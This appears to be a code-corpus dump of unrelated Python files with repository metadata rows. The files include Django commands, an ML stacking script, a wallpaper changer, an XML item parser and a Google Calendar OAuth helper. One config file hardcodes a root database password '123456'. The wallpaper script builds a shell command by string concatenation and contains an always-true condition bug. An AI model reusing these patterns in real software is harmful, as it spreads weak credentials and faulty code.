def get_dedicated_connection(cls): # 专用连接:数据库服务端一个专有进程处理该连接,相对于共享连接而言
try:
return cls.pool.dedicated_connection()
except Exception as e:
Logger.error("when get dedicated connection from pool!")
Logger.error(repr(e))
return None
# db_pool = DatabaseConnectionPool
| [
"1217158614@qq.com"
] | 1217158614@qq.com |
adb466e272744c048c455a8aebc7292a0997e0cf | da932161e15ddcd9dcbd50ccc2503c85cfb9d5ab | /ces_admin/management/commands/hash_identities.py | 58f40217c392cf5305c477c61c2f729cf311dd17 | [
"MIT"
] | permissive | datamade/coordinated-entry-screening | 9c7c01a4f5df22cb4de509f510b93f74a22ee3db | 29724ee36530f81c8b9a2d4720963de619322d12 | refs/heads/master | 2020-03-23T20:56:19.559632 | 2019-07-15T01:25:09 | 2019-07-15T01:25:09 | 142,072,104 | 2 | 0 | MIT | 2019-07-15T01:25:10 | 2018-07-23T21:37:19 | Python | UTF-8 | Python | false | false | 2,070 | py | import datetime
import hashlib
from django.core.management.base import BaseCommand
from django.db.models import Q
from django.contrib.auth.hashers import make_password, check_password
from rapidsms.models import Connection
from decisiontree.models import Session
class Command(BaseCommand):
help = '''
This command hashes identities (i.e., phone numbers) of users
who canceled, completed, or abandoned the survey.
'''
def handle(self, *args, **options):
timestamp = str(datetime.datetime.now())
self.stdout.write(self.style.NOTICE('{}: Run the script!').format(timestamp))
# Rename Django's make_password to best describe what the code does.
hash_identity = make_password
# five_minutes_ago excludes sessions from the last five minutes,
# since Rapidsms and Twilio may have a communication delay, during which
# our app still needs access to the unhashed phone number.
five_minutes_ago = datetime.datetime.now() - datetime.timedelta(minutes=5)
one_day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
filter_for_canceled_or_completed = Q(session__state_id__isnull=True, \
session__last_modified__lte=five_minutes_ago)
filter_for_abandoned = Q(session__last_modified__lte=one_day_ago)
# Use the `startswith` filter to exclude sessions that
# have already been hashed or are websessions.
sms_connections = Connection.objects \
.filter(filter_for_canceled_or_completed | filter_for_abandoned) \
.filter(identity__startswith='+1') \
.distinct()
for connection in sms_connections:
identity = connection.identity
hashed_identity = hash_identity(identity)
connection.identity = hashed_identity
connection.save()
self.stdout.write(self.style.SUCCESS('Successfully hashed an identity')) | [
"reginafcompton@gmail.com"
] | reginafcompton@gmail.com |
816f788b6bec5124501507fbd09cda758212d57a | 9a140773c0e1267ab39f09f363efd412bbcc390e | /McKinseyHackaton/Stacking/meta_classifier.py | 21a1367fe9b63245c6b098f2409308412a25f8f3 | [] | no_license | dkajtoch/Data-Science-Projects | 5aa904bad5b7ee88a5ab0dd2695d3e7341f1e000 | 3d17081686924214ae509f91ede045ad5d7c129d | refs/heads/master | 2020-03-23T10:56:02.302754 | 2018-08-12T16:11:23 | 2018-08-12T16:11:23 | 141,471,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,629 | py | import pandas as pd
import numpy as np
import sys
# --------------------------------------------------
# Custom scorer
# --------------------------------------------------
def probability_change(p, x):
from numpy import exp
res = p*(1. + 0.2*( 1. - exp(-2.)*exp( 2.*exp(-x/400.) ) ) )
return res if res<=1.0 else 1.0
def optimal_incentives(prob, premium):
from scipy.optimize import minimize_scalar
opt = []
for p, amount in zip(prob, premium):
# formula given by McKinsey
revenue = lambda x: -( amount*probability_change(p, x) - x )
res=minimize_scalar(revenue,
bounds=(0., 1.0E+05),
method='bounded'
)
opt.append(res.fun)
opt = np.array(opt)
return -np.mean(opt)
def custom_score(y_true, proba, premium, lam=1./9000.):
from sklearn.metrics import roc_auc_score
#res = 0.7 * roc_auc_score(y_true, proba) + \
# 0.3 * optimal_incentives(proba, premium) * lam
res = optimal_incentives(proba, premium)
return res
# --------------------------------------------------
# --------------------------------------------------
data_train = pd.read_csv('./stacked_train_proba.csv', usecols=['xgboost','RF','NN','renewal'])
X = data_train[['xgboost','RF','NN']]
y = data_train['renewal']
# premium
premium = pd.read_csv('../data/train.csv', usecols=['premium'])
premium = np.float64(premium['premium'].tolist())
# add extra feature
#dat = pd.read_csv('../data/train.csv', usecols=['perc_premium_paid_by_cash_credit'])
#X['extra'] = dat['perc_premium_paid_by_cash_credit']
# meta classifier
# --------------------------------------------------
if str(sys.argv[1]) == 'validate':
print('Preparing for cross-validation')
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import roc_auc_score, log_loss
clf = LogisticRegression(penalty='l2',
C=1.0E-04
)
auc_tab = np.array([])
loss_tab = np.array([])
custom_tab = np.array([])
skf = StratifiedKFold(n_splits=4, random_state=1234)
for train_index, test_index in skf.split(X,y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
y_train, y_test = y.iloc[train_index], y.iloc[test_index]
premium_test = premium[test_index]
clf.fit(X_train, y_train)
proba = clf.predict_proba(X_test)
auc = roc_auc_score(y_test, proba[:,1])
loss = log_loss(y_test, proba)
custom = custom_score(y_test.tolist(), proba[:,1], premium_test)
auc_tab = np.append(auc_tab, auc)
loss_tab = np.append(loss_tab, loss)
custom_tab = np.append(custom_tab, custom)
print('AUC: %.8f +/- %.8f' % (np.mean(auc_tab), np.std(auc_tab)))
print('Loss: %.8f +/- %.8f' % (np.mean(loss_tab), np.std(loss_tab)))
print('Custom: %.8f +/- %.8f' % (np.mean(custom_tab), np.std(custom_tab)))
elif str(sys.argv[1]) == 'predict':
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
clf = LogisticRegression(C=0.0001, penalty='l2')
clf.fit(X, y)
# Predict
X_test = pd.read_csv('./stacked_test_proba.csv', usecols=['xgboost','RF','NN'])
# add extra feature
#dat = pd.read_csv('../data/test.csv', usecols=['perc_premium_paid_by_cash_credit'])
#X_test['extra'] = dat['perc_premium_paid_by_cash_credit']
print('Writing predictions')
#proba = clf.best_estimator_.predict_proba(X_test)[:,1]
proba = clf.predict_proba(X_test)[:,1]
# export to a file
export_data = pd.read_csv('../data/test.csv', usecols=['id', 'premium'])
export_data.insert(loc=1, column='renewal', value=proba)
export_data.to_csv('../data/test_proba.csv', index=False)
elif str(sys.argv[1]) == 'majority':
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import roc_auc_score, log_loss
proba = np.float64(X.mean(axis=1).tolist())
proba = np.column_stack((1.-proba, proba))
auc_tab = np.array([])
loss_tab = np.array([])
custom_tab = np.array([])
skf = StratifiedKFold(n_splits=4, random_state=1234)
for train_index, test_index in skf.split(np.zeros(len(y)),y):
p = proba[test_index]
y_test = y.iloc[test_index]
premium_test = premium[test_index]
auc = roc_auc_score(y_test, p[:,1])
loss = log_loss(y_test, p)
custom = custom_score(y_test.tolist(), p[:,1], premium_test)
auc_tab = np.append(auc_tab, auc)
loss_tab = np.append(loss_tab, loss)
custom_tab = np.append(custom_tab, custom)
print('AUC: %.8f +/- %.8f' % (np.mean(auc_tab), np.std(auc_tab)))
print('Loss: %.8f +/- %.8f' % (np.mean(loss_tab), np.std(loss_tab)))
print('Custom: %.8f +/- %.8f' % (np.mean(custom_tab), np.std(custom_tab)))
# Predict
# X_test = pd.read_csv('./stacked_test_proba.csv', usecols=['xgboost','RF','NN'])
# add extra feature
#dat = pd.read_csv('../data/test.csv', usecols=['perc_premium_paid_by_cash_credit'])
#X_test['extra'] = dat['perc_premium_paid_by_cash_credit']
# print('Writing predictions')
#proba = clf.best_estimator_.predict_proba(X_test)[:,1]
# proba = np.float64(X_test.mean(axis=1))
# export to a file
# export_data = pd.read_csv('../data/test.csv', usecols=['id', 'premium'])
# export_data.insert(loc=1, column='renewal', value=proba)
# export_data.to_csv('../data/test_proba.csv', index=False)
| [
"dkajtoch@gmail.com"
] | dkajtoch@gmail.com |
ac88c82105770dd7f62ae1df6606974dad116b74 | 38969896f332a1d9997ecc946ac805e36297d472 | /scripts/change-background.py | bc317cb6356ee601745634906fd540999d1f3a34 | [] | no_license | tml/forkmydots | e823c68aadda9fbd6cfe6de3568ad16b9352fe57 | 8ff97a587f4ab679fd9ce11af11632563458dfb3 | refs/heads/master | 2021-01-18T07:49:39.315566 | 2013-05-21T16:34:46 | 2013-05-21T16:34:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,713 | py | #!/usr/bin/env python
#
# change-background.py
#
# A script to change to a random background image
# Originally written to use gconf to accomplish this end, it now uses
# xloadimage -onroot which is slightly less presumptuous about how the user's
# system is set up initially (considering that xloadimage is a much smaller set
# of dependencies than gconf).
#
#(c) 2012, Wayne Warren <steven.w.warren@gmail.com>
#(c) 2004, Davyd Madeley <davyd@madeley.id.au>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or(at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import sys
import os
import random
import mimetypes
home = os.getenv("HOME")
backgrounds = home + "/visual/backgrounds/"
bg_ln_name = os.path.join( backgrounds , "current" )
def get_files_recursively(rootdir):
"""Recursively get a list of files from a folder."""
fileList = []
for root, subFolders, files in os.walk(rootdir):
for file in files:
fileList.append(os.path.join(root,file))
return fileList
# TODO check for the presense of xloadimage, exit gracefully if missing
# Get the files from the backgrounds folder.
dir_items = get_files_recursively(backgrounds)
# Check if the background items are actually images. Approved files are
# put in 'items'.
items = []
for item in dir_items:
mimetype = mimetypes.guess_type(item)[0]
if mimetype and mimetype.split('/')[0] == "image":
items.append(item)
# Get a random background item from the file list.
item = random.randint(0, len(items) - 1)
# Get the current background.
if ~ os.path.exists(bg_ln_name):
current_bg = os.readlink(bg_ln_name)
else:
os.unlink(bg_ln_name)
current_bg = items[0]
# Make sure the random background item isn't the same as the background
# currently being used.
while(items[item] == current_bg):
item = random.randint(0, len(items) - 1)
dirpath = home
if os.path.exists(bg_ln_name):
os.unlink(bg_ln_name)
os.symlink(items[item], bg_ln_name)
# Finally, set the new background.
if os.path.exists(bg_ln_name):
os.system("$(which xloadimage) -onroot -display :0 " + bg_ln_name)
sys.exit()
| [
"waynr@sdf.org"
] | waynr@sdf.org |
285b78fc7266d2063001632fedcddacbfe321900 | 2d9b490f7aa764aca222baa158cc6e071e159450 | /persistence/xml_parser.py | 6deb416ef66e738eb2a65b6e274c1ee2a4e3ef1c | [] | no_license | Phaetec/rpscene | 44e81b71441bfe40be73b7b94cf4bb7429599be2 | 3a012bde79b5dae5f4199201bbf637df848d5c2d | refs/heads/develop | 2022-12-08T06:28:13.234075 | 2020-09-01T10:01:11 | 2020-09-01T10:01:11 | 164,128,854 | 1 | 0 | null | 2022-11-22T06:29:26 | 2019-01-04T16:16:30 | Python | UTF-8 | Python | false | false | 6,364 | py | import re
from defusedxml.ElementTree import parse
from django.core.exceptions import ObjectDoesNotExist
from items.errors import ItemAlreadyExists
from items.models import Armor, BonusModifier, Money
from .errors import XMLModifierCategoryNotRecognized
# NOTES:
# detail tag: Beinhaltet rarity als auch informationen wie cursed oder "requires attunement"
# roll: kann mehrmals auftauchen. Beschreibt entweder DMG oder andere Effekte. Kann variablen wie SPELL enthalten.
# - Muss noch ins Modell eingearbeitet werden
# range: Reichweite, wenn vorhanden (Waffen, spells?)
# dmg1: Damage, wenn die Waffe einen Angriffswert hat
# dmg2: Zum Beispiel Zweihanddmg bei Versatile Waffen. Noch keinen anderen Nutzen gesehen
# dmgType: Damagetyp, leider nur als Abkürzung, brauchtmehr Research was gemeint ist
# property: Sowas wie 2H, Automatic? - pistolen evtl., light, versatile, etc. Meist als 1 oder 2 Buchstaben Abkürzungen
# modifier: Die ganzen +X waffen haben zB einen. Normalerweise mehrere so wie zum Beispiel auf damage und attack roll
# - Beinhaltet ein Attribute "Category" mit werten "Bonus", "Skills" oder "Ability Score"
# value: Wert des Gegenstandes in Gold
# stealth: Wenn 1, dann hat man disadvantage für stealth mit der Ausrüstung
# strength: Benötigt mindestens den Inhalt des Tags als Stärke um Getragen zu werden
# ac: Die AC, die die Ausrüstung einem gibt
def convert_type(typename):
if typename == "LA":
return "Light Armor"
elif typename == "MA":
return "Medium Armor"
elif typename == "HA":
return "Heavy Armor"
elif typename == "S":
return "Shield"
else:
raise TypeError("Item Type not recognized")
def parse_modifiers(modifiers, item):
"""Parse modifiers and create corresponding objects."""
for mod in modifiers:
category = mod.attrib['category']
text = mod.text
if category == "bonus":
applied_to, modifier = re.split("\+", text)
mod = BonusModifier(belongs_to=item,
modifier=int(modifier.strip()),
applied_to=applied_to.strip())
mod.save()
elif category == "skills":
# TODO
pass
elif category == "ability score":
# TODO
pass
else:
raise XMLModifierCategoryNotRecognized("Modifier not recognized")
def is_magic(item):
magic_attr = item.find("magic")
if not magic_attr:
return False
if magic_attr.text != "1":
return False
return True
def parse_strength_requirement(item):
strength_var = item.find("strength")
if strength_var.text is None:
return 0
try:
requirement = int(strength_var.text)
return requirement
except (TypeError, ValueError):
return 0
def parse_details(detail):
if detail is None:
return False, False, "COMMON"
detailstring = detail.text
attunement = False
cursed = False
if "(requires attunement)" in detailstring:
attunement = True
if "cursed" in detailstring:
cursed = True
if "artifact" in detailstring:
return attunement, cursed, "ARTIFACT"
if "legendary" in detailstring:
return attunement, cursed, "LEGENDARY"
# Never put the rare case before very rare. Same with uncommon and common
if "very rare" in detailstring:
return attunement, cursed, "VERY_RARE"
if "rare" in detailstring:
return attunement, cursed, "RARE"
if "uncommon" in detailstring:
return attunement, cursed, "UNCOMMON"
if "common" in detailstring:
return attunement, cursed, "COMMON"
return attunement, cursed, "NO_INFO"
def parse_text(texts):
description = ""
for text in texts:
if text.text is None:
description += "\n"
else:
description += text.text + "\n"
return description
def create_armor(item):
# TODO Forgot to take modifier into account
name = item.find("name").text
type_str = convert_type(item.find("type").text)
magic = is_magic(item)
attunement, cursed, rarity = parse_details(item.find("detail"))
weight = float(item.find("weight").text)
ac = int(item.find("ac").text)
description = parse_text(item.findall("text"))
stealth_disadvantage = True if item.find("stealth").text == "1" else False
strength_requirement = parse_strength_requirement(item)
try:
Armor.objects.get(name=name)
# Object already exists, raise an Error
raise ItemAlreadyExists("An Item with this name already exists.")
except ObjectDoesNotExist:
new_armor = Armor(name=name, type=type_str, magic=magic, requires_attunement=attunement, cursed=cursed,
rarity=rarity, description=description, weight=weight, ac=ac,
stealth_disadvantage=stealth_disadvantage, strength_requirement=strength_requirement)
new_armor.save()
parse_modifiers(item.findall("modifier"), new_armor)
def create_money(item):
name = item.find("name").text
description = parse_text(item.findall("text"))
weight = float(item.find("weight").text)
if Money.objects.filter(name=name).exists():
raise ItemAlreadyExists("An Item with this name already exists.")
new_money = Money(name=name, description=description, weight=weight, type="Money", rarity="COMMON")
new_money.save()
def parse_and_store_item(item):
item_type = item.find("type").text
# Armor Types: LA, MA, HA (Light, Medium, Heavy Armor), S for Shield
if item_type in ["LA", "MA", "HA", "S"]:
create_armor(item)
elif item_type == "$":
create_money(item)
def parse_entities(file_path="CorePlusUAWithModern.xml"):
tree = parse(file_path)
root = tree.getroot()
for child in root.findall('item'):
try:
parse_and_store_item(child)
except ItemAlreadyExists:
pass
# for attrs in child:
# if attrs.tag not in ['weight', 'type', 'text', 'name', 'magic', 'detail', 'roll', 'range', 'dmg1',
# 'dmgType', 'property', 'dmg2', 'modifier', 'value', 'stealth', 'strength', 'ac']:
# print(attrs.tag)
# print(attrs.attrib)
# print('---')
| [
"alexander@schneider.gg"
] | alexander@schneider.gg |
8c74fecf0b15bc388c3ef543c49f558f6d4d39c6 | d40cc57c974e0233fe5dfe0d19f84de48f3f122a | /core/admin/__init__.py | 4c791a3e4f13f30eca58e68f59aa801f9bd926da | [] | no_license | DanielDiaz36/ecommerce-design | 40336181bc6a716a860c36892396f92b2ad6759f | 0a3d9af28f92af9edcb89c53ef90ab92c53bb923 | refs/heads/master | 2023-06-25T18:04:16.599222 | 2021-07-03T23:38:52 | 2021-07-03T23:38:52 | 298,940,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | # -*- coding: utf-8 -*-
"""
This file is part of the GSM Mine Shop project.
Copyright (c) 2019 GSM MINE GROUP LLC.
For the full copyright and license information, please view the LICENSE
file that was distributed with this source code.
Developed by Outboss Development Team <support@outboss.io>
"""
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
from .design import DesignAdmin
from .design_image import DesignImageAdmin
from .user_category import UserCategoryAdmin
from .design_category import DesignCategoryAdmin
from .country import CountryAdmin
admin.site.index_title = _('Inicio')
admin.site.site_header = _('Ecommerce Design Admin')
admin.site.site_title = _('Ecommerce Design Admin')
| [
"danieldiaz9211@gmail.com"
] | danieldiaz9211@gmail.com |
fc469c8bc5ffeef576be0f1bdbe4455672676d15 | 4d7a7698f74cfa730598b24524d7d17d135daf5b | /cbverifier/__init__.py | 2ab2038d582b773de99c5adaef8ef4703c665088 | [] | no_license | cuplv/verivita | 010b5d913fa25600d72980b3f9e4b45992b248b0 | 04e97a8bf582db10186b73a476fbecff1861e526 | refs/heads/master | 2021-03-27T14:19:54.315993 | 2018-09-10T16:10:20 | 2018-09-10T16:10:20 | 61,602,554 | 1 | 1 | null | 2018-11-11T19:53:29 | 2016-06-21T04:36:40 | Python | UTF-8 | Python | false | false | 21 | py | # package cbverifier
| [
"sergio.mover@gmail.com"
] | sergio.mover@gmail.com |
843e4db80ea0201c3077569bb569093601a79a4c | 73afbee610a155a5c19feb4c6aed6980c00dd7f5 | /railwayMgt/ticketCRUD/apps.py | aaf68c300f500bb3e1c0031d536fb84e099914a4 | [] | no_license | Rajat-Kaushik/RailwayManagementCRUD | 528ff21fc5ccb791d48d2459a3099e696c7a24ef | 43151bad1cdfd4c081a03008d162874ffbe62689 | refs/heads/main | 2023-04-10T05:50:55.434326 | 2021-04-26T04:25:46 | 2021-04-26T04:25:46 | 360,053,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class TicketcrudConfig(AppConfig):
name = 'ticketCRUD'
| [
"kaushik.rajat@outlook.com"
] | kaushik.rajat@outlook.com |
7423be29bd52bf57c1f3fd80469224359b422ebc | c1fa6c50d382ee37d5010560c3a3fdd85da26fa5 | /first_bot.py | 09be11289e744a73003d0a204086a86a4bcf9cfc | [] | no_license | alexanderbuc/CMPM146---P2 | eb372277b8863597b77dcdd35b171a9ca420e07f | 87d302aa7a250a4d5518e6c85eb2521560bcf59d | refs/heads/master | 2016-08-04T09:37:45.057343 | 2015-04-13T01:20:57 | 2015-04-13T01:20:57 | 33,743,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | def think(state, quip):
return state.get_moves()[0]
| [
"abuc@ucsc.edu"
] | abuc@ucsc.edu |
4e1444c19b01a44bf600264d57a586ce9312006e | d3f7e6b5ba96c5c563678f1ae83361b198105ef7 | /www/config_default.py | 2bc4ccb388a5839ecd39c03d8cc2502375661cb7 | [] | no_license | Aiss86/awesome-python3-webapp | b4b9504b76e15f51c0fa2ee4e845a2c10c594762 | cb5494b4f95e20aa748c3c84070d60dbff62f95e | refs/heads/master | 2021-05-04T02:29:28.610949 | 2016-11-01T09:17:52 | 2016-11-01T09:17:52 | 71,338,736 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Default configuration.
'''
__author__ = 'Aiss86'
configs = {
'debug': True,
'db': {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '123456',
'db': 'awesome'
},
'session': {
'secret': 'Awesome'
}
} | [
"mali@sgepri.sgcc.com.cn"
] | mali@sgepri.sgcc.com.cn |
818adc00a072ee6dd78744da0ba69c4801f939cf | fade4e5eb42c54a5fc89090740eafb8fd757a309 | /spark_coreset-master/k_means_coreset/old_version_garbage/bicriteria.py | c5b96e18075884a5f75f2a83e521464339cb6ba3 | [] | no_license | vkhakham/k-segment | 6e7d8a6e49388338fcd6b1ec81f255bb93cfef40 | 0527a19e172f428381681fc9e1dd6c0aeb48d597 | refs/heads/master | 2020-04-06T05:55:45.469433 | 2017-08-18T09:30:24 | 2017-08-18T09:30:24 | 51,445,147 | 0 | 4 | null | 2019-05-17T22:57:26 | 2016-02-10T14:14:09 | Python | UTF-8 | Python | false | false | 1,939 | py | #!/usr/bin/env python
__author__ = 'Anton'
import utils
import numpy as np
class Bicriteria(object):
def __init__(self, p, w, m):
self.p = p
self.w = w
self.m = m
#TODO: fix this to work with weights
def drop_half_points(self, points, weights, M):
d = utils.get_dist_to_centers(points, M)
median = np.median(d)
points = points[d>median]
if weights is not None:
weights = weights[d>median]
return points, weights
def drop_half_weighted_points(self, points, weights, M, W):
left = W
points_to_drop=[]
d = utils.get_dist_to_centers(points, M)
idx = np.argsort(d)
i = 0
while left > 0:
index = idx[i]
if weights[index] > left:
weights[index] -= left
left = 0
else:
left -= weights[index]
points_to_drop.append(index)
i += 1
points = np.delete(points,points_to_drop,axis=0)
weights = np.delete(weights,points_to_drop)
return points, weights
def compute(self):
bi = None
wi = None
points = self.p
weights = np.array(self.w)
W = np.sum(weights) / 2 # I should drop half of weight
while W > self.m:
prob = weights*1.0 / np.sum(weights) #Sums to 1
M, w = utils.sample(points, prob, self.m, self.w) #sample points
#if-else to concatane points to current dataset
if bi is None:
bi = M
wi = w
else:
bi = np.vstack((bi,M))
wi = np.hstack((wi,w))
points, weights = self.drop_half_weighted_points(points, weights, M, W)
if points.shape[0] < self.m:
break
W = np.sum(weights) / 2
W = int(W) #TODO: is that good?
return bi,wi
| [
"mikijoy@gmail.com"
] | mikijoy@gmail.com |
6e9e8a414373f3d05d8972dd99df84c0cd3424dc | 80519f952abe14a8226b58ca9bc8062237a45f01 | /cal_setup.py | 30bfab9d87a3309436a96469f16f67c680cb1169 | [] | no_license | vasyllyashkevych/py-google-calendar | afb486a3ab1aaa73222f0ff3f4d348130e158cae | c77b7f3085270c09b2da3068469fa97976cdfe8a | refs/heads/main | 2023-03-31T16:57:43.708860 | 2021-04-05T19:50:13 | 2021-04-05T19:50:13 | 353,659,431 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/calendar']
# SCOPES = ['https://www.googleapis.com/auth/calendar.readonly']
CREDENTIALS_FILE = 'client_secrets.json'
def get_calendar_service():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
CREDENTIALS_FILE, SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
# with open('token.pickle', 'wb') as token:
# pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
return service
| [
"vasyllyashkevych@gmail.com"
] | vasyllyashkevych@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.